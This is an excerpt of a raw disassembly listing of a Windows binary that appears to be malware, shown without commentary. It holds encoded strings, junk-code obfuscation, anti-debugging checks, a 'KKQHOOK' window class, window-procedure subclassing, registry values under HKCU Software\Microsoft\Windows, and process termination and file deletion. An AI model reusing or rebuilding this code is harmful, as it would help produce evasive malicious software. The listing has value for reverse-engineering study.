call sub_40C6DC ; TerminateProcess
push [ebp+var_25C]
call sub_40C55C ; CloseHandle
loc_408DDE: ; CODE XREF: sub_408BE4+1CA�j
lea eax, [ebp+var_104]
push eax
call sub_40C760 ; DeleteFileA
loc_408DEA: ; CODE XREF: sub_408BE4+79�j
; sub_408BE4+FB�j
pop edi
pop esi
pop ebx
leave
retn
sub_408BE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408DEF proc near ; CODE XREF: sub_408E89+27�p
; sub_408E89+41�p ...
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_1000 = byte ptr -1000h
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1008h
call sub_40C498
push esi
push edi
call sub_40C598 ; GetTickCount
push 5
push [ebp+arg_0]
call sub_40C790 ; GetWindow
mov edi, eax
mov esi, 60E9h
mov eax, 7C4Ah
mul esi
mov [ebp+var_1008], eax
mov esi, eax
loc_408E23: ; CODE XREF: sub_408DEF+94�j
or edi, edi
jnz short loc_408E2B
xor eax, eax
jmp short loc_408E85
; ---------------------------------------------------------------------------
loc_408E2B: ; CODE XREF: sub_408DEF+36�j
push 0FFFh
lea eax, [ebp+var_1000]
push eax
push edi
call sub_40C79C ; GetClassNameA
mov [ebp+var_1], 27h
add [ebp+var_1], 1
mov eax, 0Dh
sub eax, dword_43B098
push eax
push [ebp+arg_4]
lea eax, [ebp+var_1000]
push eax
call sub_401806
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_408E6E
mov eax, edi
jmp short loc_408E85
; ---------------------------------------------------------------------------
loc_408E6E: ; CODE XREF: sub_408DEF+79�j
mov eax, dword_445ACB
mov [ebp+var_1004], eax
push 2
push edi
call sub_40C790 ; GetWindow
mov edi, eax
jmp short loc_408E23
; ---------------------------------------------------------------------------
loc_408E85: ; CODE XREF: sub_408DEF+3A�j
; sub_408DEF+7D�j
pop edi
pop esi
leave
retn
sub_408DEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E89 proc near ; CODE XREF: sub_40B143+1F3�p
var_174 = dword ptr -174h
var_16F = byte ptr -16Fh
var_169 = byte ptr -169h
var_168 = dword ptr -168h
var_163 = byte ptr -163h
var_162 = byte ptr -162h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_152 = word ptr -152h
var_150 = byte ptr -150h
var_148 = byte ptr -148h
var_140 = word ptr -140h
var_13E = byte ptr -13Eh
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_129 = byte ptr -129h
var_128 = dword ptr -128h
var_122 = word ptr -122h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = dword ptr -10Ah
var_106 = dword ptr -106h
var_102 = byte ptr -102h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 174h
push ebx
push esi
push edi
mov eax, dword_445ACF
mov [ebp+var_138], eax
push 9
push offset aST ; "éĀĪāĻĒČĪŁ"
call sub_40129C
push eax
push [ebp+arg_0]
call sub_408DEF
mov ebx, eax
call sub_40C538 ; RtlGetLastWin32Error
push 8
push offset aS ; "čÕŻĮĀßČß"
call sub_40129C
push eax
push ebx
call sub_408DEF
mov ds:dword_41C950, eax
call sub_40C598 ; GetTickCount
push 0
push ds:dword_41C950
call sub_40C880 ; ShowWindow
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_112]
push eax
push ebx
call sub_40C778 ; GetWindowRect
push 0
push ds:dword_41DA84
push 0
push ebx
mov eax, [ebp+var_106]
sub eax, [ebp+var_10E]
push eax
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
push eax
push 0
push 0
push 50800000h
push offset byte_446605
push offset aKkqhook ; "KKQHOOK"
push 200h
call sub_40C88C ; CreateWindowExA
mov ds:dword_41EB84, eax
call sub_40C598 ; GetTickCount
push 6
push offset word_445EF6
call sub_40129C
mov [ebp+var_158], eax
push 19h
push offset aZnnnNiG ; "§ģŲŁÅĀßÄ×ĢŁÄĀĆėĢÄĮČÉ"
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B098
add edi, 30h
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43B098
add edi, 8
push edi
mov edi, dword_43B094
add edi, 12h
push edi
push 50800000h
push eax
mov edi, [ebp+var_158]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_41C94C, eax
call sub_40C514 ; GetCurrentThreadId
push 6
push offset word_445EF6
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B098
add edi, 120h
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43B098
add edi, 45h
push edi
mov edi, dword_43B098
add edi, 8
push edi
push 50800009h
push offset byte_446605
push eax
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_42FCF8, eax
call sub_40C514 ; GetCurrentThreadId
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 2BCh
push 0
push 0
mov eax, 14h
sub eax, dword_43B098
push eax
mov eax, dword_43B094
add eax, 12h
push eax
call sub_40C8F8 ; CreateFontA
mov [ebp+var_134], eax
call sub_40C634 ; IsDebuggerPresent
push 1
push [ebp+var_134]
push 30h
push ds:dword_41C94C
call sub_40C85C ; SendMessageA
call sub_40C5A4 ; GetVersion
push 8
push offset byte_445ED3
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_42FCF8
mov edi, dword_43B098
add edi, 120h
push edi
mov edi, dword_43B094
add edi, 30h
push edi
mov edi, dword_43B098
add edi, 2Eh
push edi
mov edi, dword_43B098
add edi, 8
push edi
push 50800003h
push offset byte_446605
push eax
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_431D04, eax
call sub_40C508 ; GetCurrentProcessId
push 8
push offset byte_445ED3
call sub_40129C
add esp, 48h
push 0
push ds:dword_41DA84
push 0
push ds:dword_42FCF8
mov edi, dword_43B098
add edi, 120h
push edi
mov edi, dword_43B098
add edi, 30h
push edi
mov edi, dword_43B098
add edi, 2Eh
push edi
mov edi, dword_43B098
add edi, 46h
push edi
push 50800003h
push offset byte_446605
push eax
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_41DA7C, eax
call sub_40C598 ; GetTickCount
mov [ebp+var_2], 1
jmp loc_409219
; ---------------------------------------------------------------------------
loc_409155: ; CODE XREF: sub_408E89+397�j
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_169]
lea esi, aXola ; "xOLa%"
mov ecx, 3
rep movsw
lea edi, [ebp+var_16F]
lea esi, a6s7P ; "6S7+P"
mov ecx, 3
rep movsw
push 4
push offset aIgq ; "Ų"
call sub_40129C
movzx edi, [ebp+var_2]
push edi
push eax
lea edi, [ebp+var_162]
push edi
call sub_40CA30
lea eax, [ebp+var_162]
push eax
push 0
push 143h
push ds:dword_431D04
call sub_40C85C ; SendMessageA
push 6
push offset aQaigq ; "Ų"
call sub_40129C
movzx edi, [ebp+var_2]
add edi, 4
push edi
push eax
lea edi, [ebp+var_162]
push edi
call sub_40CA30
add esp, 28h
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_162]
push eax
push 0
push 143h
push ds:dword_41DA7C
call sub_40C85C ; SendMessageA
mov [ebp+var_163], 0E9h
movzx eax, [ebp+var_163]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_163], al
inc [ebp+var_2]
loc_409219: ; CODE XREF: sub_408E89+2C7�j
movzx eax, [ebp+var_2]
cmp eax, 0Dh
jl loc_409155
push 6
push offset word_445EF6
call sub_40129C
mov [ebp+var_15C], eax
push 10h
push offset word_445EB6
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B098
add edi, 4
push edi
mov edi, dword_43B098
add edi, 5Bh
push edi
mov edi, dword_43B098
add edi, 62h
push edi
mov edi, dword_43B098
add edi, 0B7h
push edi
push 50000000h
push eax
mov edi, [ebp+var_15C]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_413F70, eax
mov [ebp+var_118], 5002h
add [ebp+var_118], 127Fh
push 6
push offset word_445EF6
call sub_40129C
mov [ebp+var_160], eax
push 0Fh
push offset aSN ; "čÕŻÄßĢŁÄĀĆÉĢŁČ"
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B094
add edi, 0Eh
push edi
mov edi, dword_43B098
add edi, 4Bh
push edi
mov edi, dword_43B098
add edi, 85h
push edi
mov edi, dword_43B094
add edi, 0C1h
push edi
push 50000000h
push eax
mov edi, [ebp+var_160]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_431CFC, eax
push 6
push offset word_445EF6
call sub_40129C
mov [ebp-164h], eax
push 0Ch
push offset byte_445E99
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B094
add edi, 0Eh
push edi
mov edi, dword_43B094
add edi, 54h
push edi
mov edi, dword_43B098
add edi, 0ADh
push edi
mov edi, dword_43B098
add edi, 0B7h
push edi
push 50000000h
push eax
mov edi, [ebp-164h]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_433FE4, eax
push 6
push offset word_445EF6
call sub_40129C
mov [ebp+var_168], eax
push 4Ah
push offset word_445E4E
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B094
add edi, 0Eh
push edi
mov edi, dword_43B094
add edi, 1E2h
push edi
mov edi, dword_43B098
add edi, 0DAh
push edi
mov edi, dword_43B098
add edi, 12h
push edi
push 50000000h
push eax
mov edi, [ebp+var_168]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_431D00, eax
call sub_40C538 ; RtlGetLastWin32Error
push 6
push offset word_445EF6
call sub_40129C
mov [ebp-16Ch], eax
push 26h
push offset byte_445E27
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B094
add edi, 0Eh
push edi
mov edi, dword_43B094
add edi, 0FBh
push edi
mov edi, dword_43B098
add edi, 0F3h
push edi
mov edi, dword_43B094
add edi, 1Ch
push edi
push 50000000h
push eax
mov edi, [ebp-16Ch]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_439328, eax
call sub_40C538 ; RtlGetLastWin32Error
lea edi, [ebp+var_13E]
lea esi, aAYI ; "A&y I"
mov ecx, 3
rep movsw
push offset byte_432F00
lea eax, [ebp+var_102]
push eax
call sub_40CA30
add esp, 58h
call sub_40C5A4 ; GetVersion
mov [ebp+var_3], 4
jmp short loc_4094CD
; ---------------------------------------------------------------------------
loc_4094BD: ; CODE XREF: sub_408E89+649�j
movzx eax, [ebp+var_3]
mov [ebp+eax+var_102], 78h
add [ebp+var_3], 1
loc_4094CD: ; CODE XREF: sub_408E89+632�j
mov al, [ebp+var_3]
cmp al, 0Ch
jb short loc_4094BD
mov [ebp+var_11C], 78Fh
add [ebp+var_11C], 2437h
push 4
push offset word_445E22
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_42FCF8
mov edi, dword_43B094
add edi, 16h
push edi
mov edi, dword_43B098
mov esi, edi
add esi, 76h
push esi
add edi, 8
push edi
push edi
push 50800800h
lea edi, [ebp+var_102]
push edi
push eax
push 200h
call sub_40C88C ; CreateWindowExA
mov ds:dword_410848, eax
call sub_40C5A4 ; GetVersion
push 4
push offset word_445E22
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_42FCF8
mov edi, dword_43B094
add edi, 16h
push edi
mov edi, dword_43B094
add edi, 44h
push edi
mov edi, dword_43B098
add edi, 53h
push edi
mov edi, dword_43B098
add edi, 8
push edi
push 50800000h
push offset byte_446605
push eax
push 200h
call sub_40C88C ; CreateWindowExA
mov ds:dword_41DA74, eax
call sub_40C598 ; GetTickCount
push 0
push 78h
push 0CCh
push ds:dword_41DA74
call sub_40C85C ; SendMessageA
push 6
push offset byte_445E1B
call sub_40129C
mov [ebp-170h], eax
push 16h
push offset dword_445E04
call sub_40129C
add esp, 20h
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B098
add edi, 0Bh
push edi
mov edi, dword_43B098
add edi, 8Fh
push edi
mov edi, dword_43B098
add edi, 134h
push edi
mov edi, dword_43B098
add edi, 12h
push edi
push 50800000h
push eax
mov edi, [ebp-170h]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_433FE8, eax
call sub_40C574 ; GetProcessHeap
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 190h
push 0
push 0
mov eax, dword_43B094
add eax, 4
push eax
mov eax, dword_43B098
add eax, 4
push eax
call sub_40C8F8 ; CreateFontA
mov ebx, eax
push 1
push ebx
push 30h
push ds:dword_431D04
call sub_40C85C ; SendMessageA
mov ax, word_445AE5
mov [ebp+var_140], ax
push 1
push ebx
push 30h
push ds:dword_41DA7C
call sub_40C85C ; SendMessageA
call sub_40C508 ; GetCurrentProcessId
push 1
push ebx
push 30h
push ds:dword_410848
call sub_40C85C ; SendMessageA
push 1
push ebx
push 30h
push ds:dword_41DA74
call sub_40C85C ; SendMessageA
push 1
push ebx
push 30h
push ds:dword_431CFC
call sub_40C85C ; SendMessageA
lea edi, [ebp+var_148]
lea esi, aDvybtb ; " dyTB"
movsd
movsd
push 1
push ebx
push 30h
push ds:dword_413F70
call sub_40C85C ; SendMessageA
mov [ebp+var_120], 1931h
add [ebp+var_120], 340Ch
push 1
push ebx
push 30h
push ds:dword_433FE4
call sub_40C85C ; SendMessageA
lea edi, [ebp+var_150]
lea esi, byte_445AEF
mov ecx, 2
rep movsd
push 1
push ebx
push 30h
push ds:dword_433FE8
call sub_40C85C ; SendMessageA
push 0FFFFFFFCh
push ds:dword_431D04
call sub_40C808 ; GetWindowLongA
mov ds:dword_41EA7C, eax
call sub_40C598 ; GetTickCount
push offset sub_40B01B
push 0FFFFFFFCh
push ds:dword_431D04
call sub_40C814 ; SetWindowLongA
mov [ebp+var_122], 0B3Bh
add [ebp+var_122], 6718h
push 0FFFFFFFCh
push ds:dword_41DA7C
call sub_40C808 ; GetWindowLongA
mov ds:dword_41DA78, eax
mov ebx, 90Dh
mov eax, ebx
add eax, ebx
mov ebx, eax
push offset sub_40B01B
push 0FFFFFFFCh
push ds:dword_41DA7C
call sub_40C814 ; SetWindowLongA
mov [ebp+var_128], 5EE2h
mov eax, 7823h
mul [ebp+var_128]
mov [ebp+var_174], eax
mov [ebp+var_128], eax
push 0FFFFFFFCh
push ds:dword_410848
call sub_40C808 ; GetWindowLongA
mov ds:dword_40E008, eax
mov [ebp+var_129], 0B8h
add [ebp+var_129], 0CCh
push offset sub_40B01B
push 0FFFFFFFCh
push ds:dword_410848
call sub_40C814 ; SetWindowLongA
call sub_40C634 ; IsDebuggerPresent
push 0FFFFFFFCh
push ds:dword_41DA74
call sub_40C808 ; GetWindowLongA
mov ds:dword_413F6C, eax
mov [ebp+var_130], 5F75h
inc [ebp+var_130]
push offset sub_40B01B
push 0FFFFFFFCh
push ds:dword_41DA74
call sub_40C814 ; SetWindowLongA
call sub_40C5A4 ; GetVersion
push ds:dword_431D04
call sub_40C7A8 ; SetFocus
mov ax, word_445AF7
mov [ebp+var_152], ax
pop edi
pop esi
pop ebx
leave
retn
sub_408E89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_409847 proc near ; DATA XREF: sub_40A766+80D�o
var_55FD = byte ptr -55FDh
var_55FC = dword ptr -55FCh
var_55F7 = byte ptr -55F7h
var_55F4 = word ptr -55F4h
var_55F1 = byte ptr -55F1h
var_55F0 = dword ptr -55F0h
var_55EA = byte ptr -55EAh
var_474C = dword ptr -474Ch
var_4746 = dword ptr -4746h
var_4742 = byte ptr -4742h
var_473F = byte ptr -473Fh
var_4737 = byte ptr -4737h
var_4736 = byte ptr -4736h
var_472F = byte ptr -472Fh
var_4727 = byte ptr -4727h
var_4720 = dword ptr -4720h
var_471C = word ptr -471Ch
var_4719 = byte ptr -4719h
var_4718 = word ptr -4718h
var_4716 = word ptr -4716h
var_4714 = dword ptr -4714h
var_470F = byte ptr -470Fh
var_470E = word ptr -470Eh
var_470B = byte ptr -470Bh
var_470A = word ptr -470Ah
var_4707 = byte ptr -4707h
var_4608 = byte ptr -4608h
var_4604 = dword ptr -4604h
var_4600 = dword ptr -4600h
var_45FC = dword ptr -45FCh
var_45F5 = byte ptr -45F5h
var_45F4 = dword ptr -45F4h
var_45EF = byte ptr -45EFh
var_45EB = byte ptr -45EBh
var_35FD = byte ptr -35FDh
var_35FA = word ptr -35FAh
var_35F8 = dword ptr -35F8h
var_35F4 = word ptr -35F4h
var_35F2 = word ptr -35F2h
var_35F0 = dword ptr -35F0h
var_35EC = dword ptr -35ECh
var_35E5 = byte ptr -35E5h
var_35E0 = word ptr -35E0h
var_35DE = byte ptr -35DEh
var_35D8 = byte ptr -35D8h
var_35D3 = byte ptr -35D3h
var_25D4 = byte ptr -25D4h
var_25CF = byte ptr -25CFh
var_15E4 = dword ptr -15E4h
var_15E0 = dword ptr -15E0h
var_15DC = dword ptr -15DCh
var_15D8 = dword ptr -15D8h
var_15D4 = dword ptr -15D4h
var_15D0 = dword ptr -15D0h
var_117A = byte ptr -117Ah
var_1174 = byte ptr -1174h
var_116C = byte ptr -116Ch
var_1167 = byte ptr -1167h
var_1160 = byte ptr -1160h
var_1159 = byte ptr -1159h
var_1153 = byte ptr -1153h
var_114C = dword ptr -114Ch
var_1148 = word ptr -1148h
var_1146 = byte ptr -1146h
var_113F = byte ptr -113Fh
var_1138 = word ptr -1138h
var_1136 = byte ptr -1136h
var_1133 = byte ptr -1133h
var_1034 = dword ptr -1034h
var_102D = byte ptr -102Dh
var_102C = dword ptr -102Ch
var_1028 = word ptr -1028h
var_1026 = word ptr -1026h
var_1024 = word ptr -1024h
var_1022 = word ptr -1022h
var_1020 = word ptr -1020h
var_101D = byte ptr -101Dh
var_101C = word ptr -101Ch
var_1019 = byte ptr -1019h
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_100F = byte ptr -100Fh
var_F0B = byte ptr -0F0Bh
var_E0C = dword ptr -0E0Ch
var_E08 = byte ptr -0E08h
var_608 = dword ptr -608h
var_604 = dword ptr -604h
var_600 = byte ptr -600h
var_200 = byte ptr -200h
var_1FD = byte ptr -1FDh
var_1FB = byte ptr -1FBh
var_1A8 = byte ptr -1A8h
var_1A7 = byte ptr -1A7h
push ebp
mov ebp, esp
mov eax, 5600h
call sub_40C498
push ebx
push esi
push edi
lea edi, [ebp+var_1136]
lea esi, byte_445AF9
mov ecx, 3
rep movsb
mov ax, word_445AFC
mov [ebp+var_1138], ax
lea edi, [ebp+var_113F]
lea esi, aXeXw7 ; "xe#xW7"
mov ecx, 7
rep movsb
lea edi, [ebp+var_1146]
lea esi, aSZtw ; "s* ztw"
mov ecx, 7
rep movsb
mov ax, word_445B0C
mov [ebp+var_1148], ax
mov eax, dword_445B0E
mov [ebp+var_114C], eax
call sub_40C598 ; GetTickCount
push eax
call sub_40CA3C
pop ecx
mov [ebp+var_1020], 5EBBh
movzx eax, [ebp+var_1020]
imul eax, 4F0Ch
mov [ebp+var_1020], ax
loc_4098DE: ; CODE XREF: sub_409847+EB1�j
lea edi, [ebp+var_1153]
lea esi, aMc_o9 ; " MC_O9"
mov ecx, 7
rep movsb
mov eax, 14h
sub eax, dword_43B098
push eax
lea eax, [ebp+var_F0B]
push eax
call sub_40170F
mov [ebp+var_1022], 7892h
add [ebp+var_1022], 627Dh
push 9
push offset word_445DFA
call sub_40129C
lea edi, [ebp+var_F0B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA30
mov [ebp+var_1019], 0CDh
movzx eax, [ebp+var_1019]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1019], al
lea eax, [ebp+var_600]
push eax
call sub_403449
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_1159]
lea esi, aV?zP ; "v?Z,P"
mov ecx, 3
rep movsw
push 9
push offset aCvvi ; "ÅŁŁŻŽ"
call sub_40129C
mov edi, dword_43B0B4
push off_43B0BC[edi*4]
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40CA30
call sub_40C508 ; GetCurrentProcessId
push 1
push offset aV ; ""
call sub_40129C
mov edi, 0Dh
sub edi, dword_43B098
push edi
push eax
mov edi, dword_43B0B4
push off_43B0BC[edi*4]
call sub_401806
add esp, 4Ch
cmp eax, 0FFFFh
jnz short loc_4099FB
push 0Ah
push offset aVG ; "ŚĪČŽĘŻÅŻ"
call sub_40129C
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40CA54
add esp, 10h
loc_4099FB: ; CODE XREF: sub_409847+196�j
mov [ebp+var_1024], 318Dh
add [ebp+var_1024], 466Ah
and [ebp+var_1018], 0
mov [ebp+var_1034], 4
call sub_40C574 ; GetProcessHeap
push 1Ah
push offset dword_445DC8
call sub_40129C
mov [ebp+var_15D0], eax
push 3
push offset asc_445DC4 ; "ÄĖĪ"
call sub_40129C
lea edi, [ebp+var_1160]
push edi
lea edi, [ebp+var_1034]
push edi
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp+var_15D0]
push edi
push 80000001h
call sub_4014BD
lea edi, [ebp+var_1167]
lea esi, a9yb ; "9y|'&"
mov ecx, 7
rep movsb
lea edi, [ebp+var_116C]
lea esi, aRlJ ; "Rl J"
mov ecx, 5
rep movsb
push 7
push offset aTRi ; "ÄĖĪŲ"
call sub_40129C
push [ebp+var_1018]
push eax
lea edi, [ebp+var_1133]
push edi
call sub_40CA30
mov [ebp+var_1026], 7CB6h
sub [ebp+var_1026], 556Ch
lea eax, [ebp+var_1133]
push eax
lea eax, [ebp+var_E08]
push eax
call sub_40CA54
lea edi, [ebp+var_1174]
lea esi, aMe0AP ; "Me0/&P"
movsd
movsd
push 1
push offset asc_445DBA ; "Ü"
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_E08]
push edi
push 0
call sub_4062CD
add esp, 6Ch
mov ebx, eax
call sub_40C574 ; GetProcessHeap
or ebx, ebx
jnz short loc_409B4A
lea edi, [ebp+var_15D8]
lea esi, a@_aP1 ; " @_a&P1"
mov ecx, 2
rep movsd
lea eax, [ebp+var_600]
push eax
call sub_4034D8
pop ecx
call sub_40C5A4 ; GetVersion
jmp loc_40A5BF
; ---------------------------------------------------------------------------
loc_409B4A: ; CODE XREF: sub_409847+2D7�j
and [ebp+var_1018], 0
push 1Ah
push offset dword_445DC8
call sub_40129C
mov [ebp+var_15D4], eax
push 3
push offset asc_445DC4 ; "ÄĖĪ"
call sub_40129C
push 4
push 4
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp+var_15D4]
push edi
push 80000001h
call sub_4015EB
mov [ebp+var_1028], 5BFEh
inc [ebp+var_1028]
push 0
lea eax, [ebp+var_600]
push eax
call sub_401A36
add esp, 30h
mov [ebp+var_E0C], eax
or eax, eax
jz loc_40A5BF
lea eax, [ebp+var_600]
push eax
call sub_40C760 ; DeleteFileA
lea eax, [ebp+var_600]
push eax
call sub_4034D8
pop ecx
call sub_40C574 ; GetProcessHeap
and [ebp+var_608], 0
jmp loc_40A56A
; ---------------------------------------------------------------------------
loc_409BE5: ; CODE XREF: sub_409847+D46�j
call sub_40C5A4 ; GetVersion
cmp [ebp+var_200], 0
jz loc_40A56A
call sub_40C5A4 ; GetVersion
lea ecx, [ebp+var_200]
or eax, 0FFFFFFFFh
loc_409C05: ; CODE XREF: sub_409847+3C3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409C05
cmp eax, 5Ch
jb loc_40A56A
lea edi, [ebp+var_35D8]
lea esi, aLLe ; "L LE"
mov ecx, 5
rep movsb
mov [ebp+var_1A8], 0
lea edi, [ebp+var_35DE]
lea esi, a8bd3 ; "*8bd3"
mov ecx, 3
rep movsw
push 0FFFh
lea eax, [ebp+var_25D4]
push eax
lea eax, [ebp+var_1A7]
push eax
call sub_408A95
mov ax, word_445B46
mov [ebp+var_35E0], ax
push 0FFFh
lea eax, [ebp+var_35D3]
push eax
lea eax, [ebp+var_200]
push eax
call sub_408A95
add esp, 18h
lea edi, [ebp+var_35E5]
lea esi, aWxQ ; "WX$Q"
mov ecx, 5
rep movsb
mov byte ptr [ebp+var_15D8+2], 0
call sub_40C598 ; GetTickCount
mov byte ptr [ebp+var_15D8+3], 0
jmp short loc_409CC9
; ---------------------------------------------------------------------------
loc_409CAB: ; CODE XREF: sub_409847+49B�j
movzx eax, byte ptr [ebp+var_15D8+3]
lea edx, [ebp+eax+var_25D4]
movsx ecx, byte ptr [edx]
sub ecx, eax
mov eax, ecx
mov [edx], al
add byte ptr [ebp+var_15D8+3], 1
loc_409CC9: ; CODE XREF: sub_409847+462�j
lea ecx, [ebp+var_25D4]
or eax, 0FFFFFFFFh
loc_409CD2: ; CODE XREF: sub_409847+490�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409CD2
movzx esi, byte ptr [ebp+var_15D8+3]
cmp esi, eax
jb short loc_409CAB
lea ecx, [ebp+var_25D4]
or eax, 0FFFFFFFFh
loc_409CED: ; CODE XREF: sub_409847+4AB�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409CED
lea esi, [ebp+var_35D3]
push esi
push eax
lea edi, [ebp+var_25D4]
push edi
call sub_4088D5
add esp, 0Ch
mov [ebp+var_35EC], eax
call sub_40C514 ; GetCurrentThreadId
push 5
push offset aN ; "ŚŻŽŁ"
call sub_40129C
add esp, 8
mov edi, 3
sub edi, dword_43B094
push edi
push eax
lea edi, [ebp+var_25D4]
push edi
call sub_401806
add esp, 0Ch
cmp eax, 0
jnz loc_40A21B
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_4727]
lea esi, aYxC ; "yX>c ,"
mov ecx, 7
rep movsb
mov [ebp+var_470A], 2351h
inc [ebp+var_470A]
lea eax, [ebp+var_25CF]
push eax
lea eax, [ebp+var_45EF]
push eax
call sub_40C4B8
lea edi, [ebp+var_472F]
lea esi, aDdjrm ; "!ddJrm*"
mov ecx, 8
rep movsb
mov [ebp+var_35F0], 0
mov [ebp+var_45F4], 4
mov [ebp+var_470B], 2Bh
movzx eax, [ebp+var_470B]
imul eax, 40A3h
mov [ebp+var_470B], al
lea eax, [ebp+var_4608]
push eax
lea eax, [ebp+var_45F4]
push eax
lea eax, [ebp+var_35F0]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014BD
add esp, 18h
call sub_40C598 ; GetTickCount
push 1
push offset asc_445DBA ; "Ü"
call sub_40129C
add esp, 8
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_45EF]
push edi
push offset dword_41EA80
call sub_4062CD
add esp, 20h
mov ebx, eax
call sub_40C508 ; GetCurrentProcessId
cmp ebx, 0
jnz short loc_409E64
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_600]
push eax
call sub_4034D8
add esp, 4
mov [ebp+var_474C], 3A1Ch
inc [ebp+var_474C]
jmp short loc_409EB1
; ---------------------------------------------------------------------------
loc_409E64: ; CODE XREF: sub_409847+5F5�j
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015EB
mov [ebp+var_45F5], 10h
movzx eax, [ebp+var_45F5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_45F5], al
lea eax, [ebp+var_600]
push eax
call sub_4034D8
add esp, 1Ch
call sub_40C508 ; GetCurrentProcessId
loc_409EB1: ; CODE XREF: sub_409847+61B�j
and [ebp+var_35F0], 0
mov [ebp+var_45F4], 4
lea edi, [ebp+var_4736]
lea esi, aPYN ; " P'y&n"
mov ecx, 7
rep movsb
lea eax, [ebp+var_4608]
push eax
lea eax, [ebp+var_45F4]
push eax
lea eax, [ebp+var_35F0]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014BD
add esp, 18h
lea edi, [ebp+var_4737]
lea esi, byte_445B63
xor ecx, ecx
inc ecx
rep movsb
push 0
push 0
push 4
push 0
push 0
push 80000000h
push offset dword_40E010
call sub_40C67C ; CreateFileA
mov [ebp+var_4600], eax
call sub_40C598 ; GetTickCount
push 0
push [ebp+var_4600]
call sub_40C520 ; GetFileSize
mov [ebp+var_4720], eax
mov [ebp+var_470E], 791Eh
sub [ebp+var_470E], 1754h
push [ebp+var_4600]
call sub_40C55C ; CloseHandle
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+var_4720]
cmp [ebp+var_35F0], eax
jb short loc_409F83
call sub_40C5A4 ; GetVersion
jmp loc_40A0AB
; ---------------------------------------------------------------------------
loc_409F83: ; CODE XREF: sub_409847+730�j
lea edi, [ebp+var_473F]
lea esi, a7Emen ; "7 EmEn;"
movsd
movsd
mov eax, 14h
